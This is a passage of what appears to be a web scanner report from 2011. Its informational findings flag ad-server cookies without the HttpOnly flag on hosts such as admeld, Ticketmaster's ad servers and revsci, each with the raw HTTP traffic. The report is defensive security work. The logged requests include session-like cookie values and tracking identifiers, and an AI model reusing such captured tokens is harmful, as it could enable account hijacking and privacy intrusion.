ih="b!!!#<!'s4e!!!!%=)!]+!)AU6!!!!#='htn!)AU7!!!!#=(1IK!*09R!!!!#=)![q!+[=I!!!!#=)n6E!+[>D!!!!#=)n4%!,+Yc!!!!)=)n0b!,y[%!!!!(=)man!->hZ!!!!#=(6NE!-fi6!!!!#=(8L5!-fiH!!!!#=(8HV!-ru2!!!!#=)mUu!.#:D!!!!#='htp!.XR3!!!!(=)m_O!.`.U!!!!#='htS!.g%4!!!!(=)o3I!.g%_!!!!%=)nrD!.g(s!!!!,=)o.b!.g(t!!!!%=)nv0!.g.)!!!!'=)md7!/!O+!!!!#=(aKx!/'y^!!!!#=(1IG!/+NP!!!!#=(aOb!/2Gk!!!!#=)nhw!/4Kq!!!!#=)nPm!/JVV!!!!'='jNd!/cnt!!!!$=)!Zg!/noe!!!!$=%=]O!/pW_!!!!$=)nJc!/peY!!!!#=)n-H!/pi4!!!!#=)nN$!/pid!!!!#=)nPE!/wxM!!!!$=)n(a!08vf!!!!$=)nFv!0Ehb!!!!#=)n,v!0Q8#!!!!#=)mx$!0Q[/!!!!#=)n?I!0Q]c!!!!#=%3V4!0eUu!!!!#=)Pl$!0ucs!!!!$=)n>t!0v*F!!!!#=)nLX!0w#]!!!!#=)n@k!1#Gq!!!!$=)n+(!1#HS!!!!#=)n7A!1#HT!!!!#=)n7j!1-6r!!!!$=)nAe!1@m6!!!!$=%3V#!1W47!!!!#=)Pl)!1W4@!!!!#=(1IO!1YRS!!!!$=)n'g!1Z@+!!!!#=)myI!1Z@/!!!!#=)n$<!1Z@0!!!!#=)n!o!1]f-!!!!>=)nf-!1_f$!!!!'=)n@C!1_f'!!!!)=)n=Q!1`)_!!!!#=)![y!1e75!!!!#=%3V6!1kL!!!!!$=)n3*!1qGe!!!!#=%1p'!1sCA!!!!#=)nK_!1wmg!!!!#=)![j!2*$P!!!!#=)n)2!2*,b!!!!#=(h4W!2-Vw!!!!$=)nQ@!2.uG!!!!#=)mio!2.wX!!!!#=)n#k!21R/!!!!#=)n`u!23At!!!!#=)mda!23o_!!!!'=)m[2!294N!!!!(=)mhK!2:N8!!!!#=%3UW!2=_P!!!!#=%3Vp!2Cr6!!!!$=)naG!2KhY!!!!$=)ncg!2Khp!!!!#=)nbB!2L<B!!!!#=(1ID!2N5$!!!!5=)mxw!2NGs!!!!#=)n>K!2Y#q!!!!#=(aO]!2Y$+!!!!'=)!c2!2Z9v!!!!$=)ne[!2`+,!!!!#='hw!!2g$h!!!!$=)nL.!2g$l!!!!$=)nRd!2g'^!!!!#=)ng*!2g>n!!!!$=)n,#!2gH2!!!!#='i#o!2jZq!!!!%=)n`L!2jZv!!!!$=)nVx!2j[4!!!!%=)nYA!2j[6!!!!$=)nU+!2j[@!!!!#=)n[a!2j[B!!!!#=)nUT!2jg(!!!!$=)n^V!2l9<!!!!$=)nIg!2l>@!!!!#=(aKS!2t,W!!!!$=)nF#!3!Yk!!!!$=)n*.!3$a2!!!!#=)5nT!3$vo!!!!#=)nc>!3$yw!!!!$=)n_Q!3'oN!!!!+=)nGr!3/P1!!!!#=)ndb!30M5!!!!#=)nNM!349Y!!!!#=)m[Z!34t)!!!!$=)nGH!35`n!!!!#=)nHC!36PE!!!!$=)n=x"; uid=uid=8a044d34-ad47-11e0-98d7-9bec9b275be2&_hmacv=1&_salt=1095483093&_keyid=k1&_hmac=e9bfd70fd4e5afb89d366b3b6b929ea9a1f33983; bh="b!!!%1!!!?J!!!!*=+40Q!!(1-!!!!/=+e?/!!*lZ!!!!#=$Wj6!!,WM!!!!#=$Wj6!!..X!!!!'=$L=p!!/GK!!!!/=+e?/!!/GR!!!!/=+e?/!!/Ju!!!!%=+40Q!!/K$!!!!*=+e?/!!0+@!!!!#='hs@!!04a!!!!#='hs@!!1Mv!!!!#=#T]$!!2*J!!!!#=%=bB!!3ba!!!!0=,'-e!!4F0!!!!*=+e?/!!4Rk!!!!#=!iBY!!<A!!!!!$=!iQw!!?VS!!<NC=)n!A!!J<J!!!!0=+e?/!!J<K!!!!0=+e?/!!J<O!!!!.=+e?/!!J<S!!!!0=+e?/!!Kc5!!!!#=!Y*a!!LHY!!!!$=#$2R!!OfW!!!!$=)DMq!!PKh!!!!'=+$jA!!PL)!!!!'=+$jA!!PL`!!!!(=+$jA!!Rp$!!!!#='oUr!!Z+p!!!!#=!c8X!!ZUR!!!!#=$_dh!!]lj!!!!$=!iQw!!i5*!!!!%=!iR9!!itb!!!!0=+e?/!!j,.!!<NC=)n!A!!jB6!!!!$=!mmT!!jB7!!!!#=!mmT!!mL?!!!!#=%=pu!!nAs!!!!#=$Wj6!!rms!!!!#=!c8X!!ry1!!!!'=!msj!!tLi!!!!#=,p*7!!t^6!!!!%=!Tiu!!u*$!!!!%=!iXa!!x^7!!!!#=$Wj6!#$gc!!!!$=!iQw!#$k4!!!!$=!iQw!#')-!!!!#=$G[5!#'hi!!!#(=$Lth!#(C#!!!!%=%3Vm!#-B#!!!!#=$G#-!#.g1!!!!%=,pEK!#/h(!!!!(=!msk!#/m:!!!!#=!nGq!#0[r!!!!#=#32s!#16I!!<NC=)n!A!#2%T!!!!%=)YC>!#2.i!!!!'=+$jA!#2g8!!!!#=%=bG!#2lt!!!!#=(BUr!#2m_!!!!#=(BV(!#2m`!!!!#=(C2b!#3pS!!!!#=$G$k!#3t$!!!!#=!yui!#4O_!!!!#='ht3!#5(Y!!!!#=$G$k!#5(^!!!!#=%H`<!#5(a!!!!#=$G#u!#8*]!!!!#=$G]3!#8>+!!!!#=!i9S!#:<o!!!!%=!mwU!#<,#!!!!#=%=bG!#<v4!!!!#=(BU+!#?dj!!!!$=#qMG!#?dk!!!!$=#qMG!#?gk!!!!#=(BV@!#C@M!!!!#=!iK@!#D`%!!!!.=+e?/!#Dri!!!!$=)YC=!#H23!!!!#=%=px!#Km2!!!!#='>m<!#L$j!!!!#=#M=.!#M1G!!!!#=!c8A!#MQN!!!!#=!iJ]!#MQO!!!!#=!iJ]!#MQS!!!!#=!iJ]!#MTC!!!!.=+e?/!#MTF!!!!'=%=]S!#MTH!!!!0=+e?/!#MTI!!!!.=(6NF!#MTJ!!!!0=+e?/!#Nyi!!!!#=!eq^!#O@L!!<NC=):+(!#O@M!!<NC=):+(!#O_8!!!!'=$$NV!#QZ6!!!!#=(is%!#Q_h!!!!#=%VvP!#QfM!!!!#=!eq^!#Qu0!!!!$=)!]+!#Sq>!!!!#='>m<!#T^F!!!!#=!yv!!#TnE!!!!'=+e?/!#UDQ!!!!0=+e?/!#UW*!!!!#=!dNx!#U_(!!!!#=#$.X!#V7#!!!!#='ht3!#V=G!!!!#=$$P0!#X9r!!!!#=,p/l!#XF5!!!!#=%=bI!#Ym8!!!!#=(C1>!#]%`!!!!$='i$P!#]*j!!!!%=,'cs!#]<e!!!!#=!iHj!#]@s!!!!#=#$2P!#]Up!!!!'=+e?/!#]Uq!!!!'=+e?/!#]Uy!!!!'=+e?/!#]Z!!!!!*=(5yj!#]w)!!!!,=(6NF!#]w4!!!!)=%1p(!#]wQ!!!!(=$_d[!#]wT!!!!)=%1p(!#]x!!!!!(=$_d[!#^F1!!!!#=(C1Q!#^F2!!!!#=(BUC!#^cm!!!!$=+e?/!#^d6!!!!$='i$P!#_am!!!!)=#!Wq!#_wj!!!!)=#!Wq!#`-Z!!!!)=+e?/!#`-[!!!!)=+e?/!#`cS!!!!#=%id8!#aH+!!!!#='>m<!#aP0!!!!%='7bP!#aPZ!!!!%=(C2c!#a]3!!!!$=!iR@!#a^D!!!!#=$GZg!#b65!!!!#=#mS:!#b8-!!!!%=+e?/!#b86!!!!%=+e?/!#b87!!!!%=+e?/!#b8:!!!!%=+e?/!#b8F!!!!%=+e?/!#b<Y!!!!#=%H`<!#b<_!!!!#=%H`<!#b<a!!!!#=$G#-!#b='!!!!#=$G#u!#b=*!!!!#=$G#-!#b=E!!!!#=%H`<!#b=F!!!!#=$G#u!#b?f!!!!(=!msh!#biv!!!!#=!iK0!#c-O!!!!+=%Vw)!#c-Z!!!!#=%VYB!#c8m!!!!*=(5yj!#c8p!!!!*=(5yj!#c@(!!!!%=+e?/!#c@[!!!!#=(BU+!#cmG!!!!#=(BU+!#dCX!!!!(=*3W+!#dWf!!!!#=#mS:!#eDE!!!!$=)YX/!#eSD!!!!(=$_d[!#fFG!!!!#=#T_g!#fpW!!!!#=#M=$!#fpX!!!!#=#M=$!#fpY!!!!#=#M=$!#g)H!!!!$=+e?/!#h.N!!!!#=#M8b!#mP$!!!!$=(C6j!#nci!!!!#=$_di!#ofW!!!!'=#!W!!#ogg!!!!#=#!Wq!#p6E!!!!#=#$.[!#p6Z!!!!#=#$.r!#pI<!!!!%=!iWP!#pO,!!!!#=(CAZ!#q+A!!!!'=+e?/!#q2T!!!!$=#$2R!#q2U!!!!$=#$2R!#q4c!!!!$=!iWQ!#qe/!!!!%=(bf8!#qe0!!!!%=(bf8!#r-[!!!!#=!c8Z!#rj7!!!!#=(BU+!#sAb!!!!$=%HZN!#sAc!!!!$=%HZN!#sAd!!!!$=%HZN!#sAf!!!!$=%HZN!#sB1!!!!$=%HZN!#sB7!!!!$=%HZN!#sBR!!!!$=%HZN!#sC4!!!!$=%HZN!#sD[!!!!$=%HZN!#sDa!!!!#=(Gfu!#s`D!!!!$=(Gfu!#s`L!!!!#=(BU+!#s`N!!!!#=(BU+!#s`O!!!!#=(BU+!#s`P!!!!#=(BU+!#sa7!!!!#=(Gfu!#sa^!!!!#=(Gfu!#sak!!!!#=(Gfu!#sfb!!!!#=(Gfu!#sli!!!!#=+%.t!#slj!!!!#=#T_f!#t>.!!!!#=(C6j!#t?S!!!!#=(bpR!#tM)!!!!%=(6NF!#tM*!!!!$=$Ju9!#uQC!!!!+='htq!#uY<!!!!#=!yv$!#v,b!!!!#=#mS:!#v?X!!!!#=#qMG!#v?a!!!!#=#qMG!#v@3!!!!#=%=bP!#vC^!!!!%=+40Q!#w!v!!!!#=+(:i!#w3I!!!!#=(bX/!#w7%!!!!#=(bX/!#wUS!!!!0=+rZu!#wYG!!!!$=(bxK!#wcv!!!!#=$Wil!#x??!!!!$=!oL8!#xBt!!!!#=#mS:!#xtJ!!!!#=(C1t!$!6n!!!!$=+e?/!$!@.!!!!#=#HfR!$!U7!!!!#=%=bO!$!VA!!!!#=+40Q!$!VB!!!!#=+40Q!$!]L!!!!#=(6?f!$#B<!!!!#=$_dh!$#BA!!!!#=$_dh!$#R7!!!!'=+e?/!$#X4!!!!#=#%VO!$#yu!!!!.=+e?/!$$I]!!!!%=+e?/!$$Ig!!!!%=+e?/!$$Il!!!!%=+e?/!$$K<!!!!#=#$.g!$'$#!!!!#=(0.`!$'%-!!!!%=)n$<!$'/S!!!!#=#mS:!$'?p!!!!#=(Gfu!$'A4!!!!#=(Gfu!$'A6!!!!#=(Gfu!$'AB!!!!#=(Gfu!$'AJ!!!!#=(Gfu!$'B'!!!!#=(Gfu!$'B)!!!!#=(Gfu!$(:q!!!!#=$Fss!$(Gt!!!!)=+e?/!$(Z`!!!!#=!iJp!$(ax!!!!#=#HfS!$(f7!!!!#=$_d[!$)Nf!!!!#=$GZg!$)ZR!!!!#=!i9S!$+VB!!!!#=(1IG!$+_V!!!!#=$Wj6!$,0:!!!!#=$$BQ!$,_+!!!!%=(C2d!$,gE!!!!$=!iQt!$-rx!!!!#=$GXw!$.#F!!!!%=)I#r!$._W!!!!#='i+,!$0Tw!!!!#=(6NF!$0V+!!!!#='htq!$35v!!!!#=(BU="; BX=edn6q5d6t078b&b=4&s=k0&t=135

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 20:25:58 GMT
Server: YTS/1.18.4
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Set-Cookie: bh="b!!!%3!!!?J!!!!*=+40Q!!(1-!!!!/=+e?/!!*lZ!!!!#=$Wj6!!,WM!!!!#=$Wj6!!..X!!!!'=$L=p!!/GK!!!!/=+e?/!!/GR!!!!/=+e?/!!/Ju!!!!%=+40Q!!/K$!!!!*=+e?/!!0+@!!!!#='hs@!!04a!!!!#='hs@!!1Mv!!!!#=#T]$!!2*J!!!!#=%=bB!!3ba!!!!0=,'-e!!4F0!!!!*=+e?/!!4Rk!!!!#=!iBY!!<A!!!!!$=!iQw!!?VS!!<NC=)n!A!!J<J!!!!0=+e?/!!J<K!!!!0=+e?/!!J<O!!!!.=+e?/!!J<S!!!!0=+e?/!!Kc5!!!!#=!Y*a!!LHY!!!!$=#$2R!!OfW!!!!$=)DMq!!PKh!!!!'=+$jA!!PL)!!!!'=+$jA!!PL`!!!!(=+$jA!!Rp$!!!!#='oUr!!Z+p!!!!#=!c8X!!ZUR!!!!#=$_dh!!]lj!!!!$=!iQw!!i5*!!!!%=!iR9!!itb!!!!0=+e?/!!j,.!!<NC=)n!A!!jB6!!!!$=!mmT!!jB7!!!!#=!mmT!!mL?!!!!#=%=pu!!nAs!!!!#=$Wj6!!rms!!!!#=!c8X!!ry1!!!!'=!msj!!tLi!!!!#=,p*7!!t^6!!!!%=!Tiu!!u*$!!!!%=!iXa!!x^7!!!!#=$Wj6!#$gc!!!!$=!iQw!#$k4!!!!$=!iQw!#')-!!!!#=$G[5!#'hi!!!#(=$Lth!#(C#!!!!%=%3Vm!#-B#!!!!#=$G#-!#.g1!!!!%=,pEK!#/h(!!!!(=!msk!#/m:!!!!#=!nGq!#0[r!!!!#=#32s!#16I!!<NC=)n!A!#2%T!!!!%=)YC>!#2.i!!!!'=+$jA!#2g8!!!!#=%=bG!#2lt!!!!#=(BUr!#2m_!!!!#=(BV(!#2m`!!!!#=(C2b!#3pS!!!!#=$G$k!#3t$!!!!#=!yui!#4O_!!!!#='ht3!#5(Y!!!!#=$G$k!#5(^!!!!#=%H`<!#5(a!!!!#=$G#u!#8*]!!!!#=$G]3!#8>+!!!!#=!i9S!#:<o!!!!%=!mwU!#<,#!!!!#=%=bG!#<v4!!!!#=(BU+!#?dj!!!!$=#qMG!#?dk!!!!$=#qMG!#?gk!!!!#=(BV@!#C@M!!!!#=!iK@!#D![~~!#D`%!!!!.=+e?/!#Dri!!!!$=)YC=!#H23!!!!#=%=px!#Km2!!!!#='>m<!#L$j!!!!#=#M=.!#M1G!!!!#=!c8A!#MQN!!!!#=!iJ]!#MQO!!!!#=!iJ]!#MQS!!!!#=!iJ]!#MTC!!!!.=+e?/!#MTF!!!!'=%=]S!#MTH!!!!0=+e?/!#MTI!!!!.=(6NF!#MTJ!!!!0=+e?/!#Nyi!!!!#=!eq^!#O@L!!<NC=):+(!#O@M!!<NC=):+(!#O_8!!!!'=$$NV!#QZ6!!!!#=(is%!#Q_h!!!!#=%VvP!#QfM!!!!#=!eq^!#Qu0!!!!$=)!]+!#Sq>!!!!#='>m<!#T^F!!!!#=!yv!!#TnE!!!!'=+e?/!#UDQ!!!!0=+e?/!#UW*!!!!#=!dNx!#U_(!!!!#=#$.X!#V7#!!!!#='ht3!#V=G!!!!#=$$P0!#X9r!!!!#=,p/l!#XF5!!!!#=%=bI!#Ym8!!!!#=(C1>!#]%`!!!!$='i$P!#]*j!!!!%=,'cs!#]<e!!!!#=!iHj!#]@s!!!!#=#$2P!#]Up!!!!'=+e?/!#]Uq!!!!'=+e?/!#]Uy!!!!'=+e?/!#]Z!!!!!*=(5yj!#]w)!!!!,=(6NF!#]w4!!!!)=%1p(!#]wQ!!!!(=$_d[!#]wT!!!!)=%1p(!#]x!!!!!(=$_d[!#^F1!!!!#=(C1Q!#^F2!!!!#=(BUC!#^cm!!!!$=+e?/!#^d6!!!!$='i$P!#_am!!!!)=#!Wq!#_wj!!!!)=#!Wq!#`-Z!!!!)=+e?/!#`-[!!!!)=+e?/!#`cS!!!!#=%id8!#aH+!!!!#='>m<!#aP0!!!!%='7bP!#aPZ!!!!%=(C2c!#a]3!!!!$=!iR@!#a^D!!!!#=$GZg!#b65!!!!#=#mS:!#b8-!!!!%=+e?/!#b86!!!!%=+e?/!#b87!!!!%=+e?/!#b8:!!!!%=+e?/!#b8F!!!!%=+e?/!#b<Y!!!!#=%H`<!#b<_!!!!#=%H`<!#b<a!!!!#=$G#-!#b='!!!!#=$G#u!#b=*!!!!#=$G#-!#b=E!!!!#=%H`<!#b=F!!!!#=$G#u!#b?f!!!!(=!msh!#bTx~~!#biv!!!!#=!iK0!#c-O!!!!+=%Vw)!#c-Z!!!!#=%VYB!#c8m!!!!*=(5yj!#c8p!!!!*=(5yj!#c@(!!!!%=+e?/!#c@[!!!!#=(BU+!#cmG!!!!#=(BU+!#dCX!!!!(=*3W+!#dWf!!!!#=#mS:!#eDE!!!!$=)YX/!#eSD!!!!(=$_d[!#fFG!!!!#=#T_g!#fpW!!!!#=#M=$!#fpX!!!!#=#M=$!#fpY!!!!#=#M=$!#g)H!!!!$=+e?/!#h.N!!!!#=#M8b!#mP$!!!!$=(C6j!#nci!!!!#=$_di!#ofW!!!!'=#!W!!#ogg!!!!#=#!Wq!#p6E!!!!#=#$.[!#p6Z!!!!#=#$.r!#pI<!!!!%=!iWP!#pO,!!!!#=(CAZ!#q+A!!!!'=+e?/!#q2T!!!!$=#$2R!#q2U!!!!$=#$2R!#q4c!!!!$=!iWQ!#qe/!!!!%=(bf8!#qe0!!!!%=(bf8!#r-[!!!!#=!c8Z!#rj7!!!!#=(BU+!#sAb!!!!$=%HZN!#sAc!!!!$=%HZN!#sAd!!!!$=%HZN!#sAf!!!!$=%HZN!#sB1!!!!$=%HZN!#sB7!!!!$=%HZN!#sBR!!!!$=%HZN!#sC4!!!!$=%HZN!#sD[!!!!$=%HZN!#sDa!!!!#=(Gfu!#s`D!!!!$=(Gfu!#s`L!!!!#=(BU+!#s`N!!!!#=(BU+!#s`O!!!!#=(BU+!#s`P!!!!#=(BU+!#sa7!!!!#=(Gfu!#sa^!!!!#=(Gfu!#sak!!!!#=(Gfu!#sfb!!!!#=(Gfu!#sli!!!!#=+%.t!#slj!!!!#=#T_f!#t>.!!!!#=(C6j!#t?S!!!!#=(bpR!#tM)!!!!%=(6NF!#tM*!!!!$=$Ju9!#uQC!!!!+='htq!#uY<!!!!#=!yv$!#v,b!!!!#=#mS:!#v?X!!!!#=#qMG!#v?a!!!!#=#qMG!#v@3!!!!#=%=bP!#vC^!!!!%=+40Q!#w!v!!!!#=+(:i!#w3I!!!!#=(bX/!#w7%!!!!#=(bX/!#wUS!!!!0=+rZu!#wYG!!!!$=(bxK!#wcv!!!!#=$Wil!#x??!!!!$=!oL8!#xBt!!!!#=#mS:!#xtJ!!!!#=(C1t!$!6n!!!!$=+e?/!$!@.!!!!#=#HfR!$!U7!!!!#=%=bO!$!VA!!!!#=+40Q!$!VB!!!!#=+40Q!$!]L!!!!#=(6?f!$#B<!!!!#=$_dh!$#BA!!!!#=$_dh!$#R7!!!!'=+e?/!$#X4!!!!#=#%VO!$#yu!!!!.=+e?/!$$I]!!!!%=+e?/!$$Ig!!!!%=+e?/!$$Il!!!!%=+e?/!$$K<!!!!#=#$.g!$'$#!!!!#=(0.`!$'%-!!!!%=)n$<!$'/S!!!!#=#mS:!$'?p!!!!#=(Gfu!$'A4!!!!#=(Gfu!$'A6!!!!#=(Gfu!$'AB!!!!#=(Gfu!$'AJ!!!!#=(Gfu!$'B'!!!!#=(Gfu!$'B)!!!!#=(Gfu!$(:q!!!!#=$Fss!$(Gt!!!!)=+e?/!$(Z`!!!!#=!iJp!$(ax!!!!#=#HfS!$(f7!!!!#=$_d[!$)Nf!!!!#=$GZg!$)ZR!!!!#=!i9S!$+VB!!!!#=(1IG!$+_V!!!!#=$Wj6!$,0:!!!!#=$$BQ!$,_+!!!!%=(C2d!$,gE!!!!$=!iQt!$-rx!!!!#=$GXw!$.#F!!!!%=)I#r!$._W!!!!#='i+,!$0Tw!!!!#=(6NF!$0V+!!!!#='htq!$35v!!!!#=(BU="; path=/; expires=Thu, 18-Jul-2013 20:25:58 GMT
Set-Cookie: BX=edn6q5d6t078b&b=4&s=k0&t=135; path=/; expires=Tue, 19-Jan-2038 03:14:07 GMT
Cache-Control: no-store
Last-Modified: Tue, 19 Jul 2011 20:25:58 GMT
Pragma: no-cache
Content-Length: 43
Content-Type: image/gif
Age: 0
Proxy-Connection: close

GIF89a.............!.......,...........D..;

14.23. http://admeld.lucidmedia.com/clicksense/admeld/match  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://admeld.lucidmedia.com
Path:   /clicksense/admeld/match

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /clicksense/admeld/match?admeld_user_id=22e7a59d-553a-4d2e-a8a1-6434f26cd599&admeld_adprovider_id=73&admeld_call_type=js&admeld_callback=http://tag.admeld.com/match HTTP/1.1
Host: admeld.lucidmedia.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/610/bostonglobe/300x250/bg_1064637_61606228?t=1311108266616&tz=300&hu=&ht=js&hp=0&url=http%3A%2F%2Fwww.boston.com%2FBoston%2Fbusinessupdates%2F2011%2F07%2Fstate-street-announces-more-job-cuts%2F2Ah9Wno4Q7WHDubEEBBYLN%2Findex.html%3Fp1%3DNews_links&refer=http%3A%2F%2Fwww.fakereferrerdominator.com%2FreferrerPathName%3FRefParName%3DRefValue
Cookie: 2=2zSglxcnUrQ; 2=2zSglxcnUrQ

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Cache-control: no-cache, no-store
Pragma: no-cache
Date: Tue, 19 Jul 2011 20:44:22 GMT
Expires: Tue, 19 Jul 2011 20:44:22 GMT
P3P: CP="NOI ADM DEV CUR"
Set-Cookie: 2=2zSglxcnUrQ; Domain=.lucidmedia.com; Expires=Wed, 18-Jul-2012 20:44:22 GMT; Path=/
Set-Cookie: 2=2zSglxcnUrQ; Domain=.lucidmedia.com; Expires=Wed, 18-Jul-2012 20:44:22 GMT; Path=/
Content-Type: text/plain
Content-Length: 164
Connection: close

document.write('<img height="0" width="0" style="display: none;" src="http://tag.admeld.com/match?admeld_adprovider_id=73&external_user_id=3449391312096071132"/>');

14.24. http://ads.as4x.tmcs.ticketmaster.com/js.ng/site=tm&pagepos=3002&adsize=422x40&Params.lifetime=30&page=event&majorcatid=10001&minorcatid=1&dmaid=324&venuezip=07073&venueid=1233&artistid=1308249&secondaryid=836507&promoter=653&bgcolor=ffffff&artist1_name=u2&cceclassid=0&lang=en-us&brand=0&eventid=000043582C516D43  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ads.as4x.tmcs.ticketmaster.com
Path:   /js.ng/site=tm&pagepos=3002&adsize=422x40&Params.lifetime=30&page=event&majorcatid=10001&minorcatid=1&dmaid=324&venuezip=07073&venueid=1233&artistid=1308249&secondaryid=836507&promoter=653&bgcolor=ffffff&artist1_name=u2&cceclassid=0&lang=en-us&brand=0&eventid=000043582C516D43

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /js.ng/site=tm&pagepos=3002&adsize=422x40&Params.lifetime=30&page=event&majorcatid=10001&minorcatid=1&dmaid=324&venuezip=07073&venueid=1233&artistid=1308249&secondaryid=836507&promoter=653&bgcolor=ffffff&artist1_name=u2&cceclassid=0&lang=en-us&brand=0&eventid=000043582C516D43 HTTP/1.1
Host: ads.as4x.tmcs.ticketmaster.com
Proxy-Connection: keep-alive
Referer: http://www.ticketmaster.com/event/000043582C516D43?artistid=736365&majorcatid=10001&minorcatid=1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: GEORAN=1; SID=Y3dq6VJOUobgvd5jFa2adifFsjQPEDu1SwQqHaI3I3ywZ2h_RqrBBbchAambLEYToFNp0jdvZxmi9vEG; BID=MN5k2Ii01e9c8eT9zIsTZrTP8tnmzVQDkHCqfm3pQgSOOVA96YtvgyxM-HQGO_XI68l_ZoGoHFIlKwiEeN9v; NDMA=238; NPDMA=238; GEO_OMN=in

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 18:35:46 GMT
Server: Apache
Set-Cookie: NGUserID=a4b2480-32187-970230788-20; expires=Wednesday, 30-Dec-2037 16:00:00 GMT; path=/
AdServer: svr2.ads.ash3.clisys.tmcs:9691:1
P3P: policyref="http://ads.as4x.tmcs.net/w3c/p3p.xml", CP="NOI DSP LAW NID PSA ADM OUR IND NAV COM", policyref="http://ads.as4x.tmcs.net/w3c/p3p.xml", CP="NOI DSP LAW NID PSA ADM OUR IND NAV COM"
Pragma: no-cache
Content-Length: 114
Connection: close
Content-Type: application/x-javascript

document.write('<img src=\"http://creatives.as4x.tmcs.net/blue_dot.gif\" width=\"1\" height=\"1\" border=\"0\">');

14.25. http://ads.as4x.tmcs.ticketmaster.com/js.ng/site=tm&pagepos=3004&adsize=422x30&Params.lifetime=30&page=event&majorcatid=10001&minorcatid=1&dmaid=324&venuezip=07073&venueid=1233&artistid=1308249&secondaryid=836507&promoter=653&bgcolor=ffffff&artist1_name=u2&cceclassid=0&lang=en-us&brand=0&eventid=000043582C516D43  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ads.as4x.tmcs.ticketmaster.com
Path:   /js.ng/site=tm&pagepos=3004&adsize=422x30&Params.lifetime=30&page=event&majorcatid=10001&minorcatid=1&dmaid=324&venuezip=07073&venueid=1233&artistid=1308249&secondaryid=836507&promoter=653&bgcolor=ffffff&artist1_name=u2&cceclassid=0&lang=en-us&brand=0&eventid=000043582C516D43

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /js.ng/site=tm&pagepos=3004&adsize=422x30&Params.lifetime=30&page=event&majorcatid=10001&minorcatid=1&dmaid=324&venuezip=07073&venueid=1233&artistid=1308249&secondaryid=836507&promoter=653&bgcolor=ffffff&artist1_name=u2&cceclassid=0&lang=en-us&brand=0&eventid=000043582C516D43 HTTP/1.1
Host: ads.as4x.tmcs.ticketmaster.com
Proxy-Connection: keep-alive
Referer: http://www.ticketmaster.com/event/000043582C516D43?artistid=736365&majorcatid=10001&minorcatid=1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: GEORAN=1; SID=Y3dq6VJOUobgvd5jFa2adifFsjQPEDu1SwQqHaI3I3ywZ2h_RqrBBbchAambLEYToFNp0jdvZxmi9vEG; BID=MN5k2Ii01e9c8eT9zIsTZrTP8tnmzVQDkHCqfm3pQgSOOVA96YtvgyxM-HQGO_XI68l_ZoGoHFIlKwiEeN9v; NDMA=238; NPDMA=238; GEO_OMN=in

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 18:35:46 GMT
Server: Apache
Set-Cookie: NGUserID=a4b2480-32187-1010193989-19; expires=Wednesday, 30-Dec-2037 16:00:00 GMT; path=/
AdServer: svr2.ads.ash3.clisys.tmcs:9691:1
P3P: policyref="http://ads.as4x.tmcs.net/w3c/p3p.xml", CP="NOI DSP LAW NID PSA ADM OUR IND NAV COM", policyref="http://ads.as4x.tmcs.net/w3c/p3p.xml", CP="NOI DSP LAW NID PSA ADM OUR IND NAV COM"
Pragma: no-cache
Content-Length: 114
Connection: close
Content-Type: application/x-javascript

document.write('<img src=\"http://creatives.as4x.tmcs.net/blue_dot.gif\" width=\"1\" height=\"1\" border=\"0\">');

14.26. http://ads.revsci.net/adserver/ako  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ads.revsci.net
Path:   /adserver/ako

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /adserver/ako?rsi_noads=1&rsi_pixel=1&rsi_account=788D060407632FEEC1CAF36849FCD437&rsi_site=5B0808D11C7842FEE1E62BF14D546420&rsi_event=4F8AC0F46333C645B9A6CF1F71CCA4D9 HTTP/1.1
Host: ads.revsci.net
Proxy-Connection: keep-alive
Referer: http://www.facebook.com/advertising/?campaign_id=402047449186&placement=pflo&extra_1=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
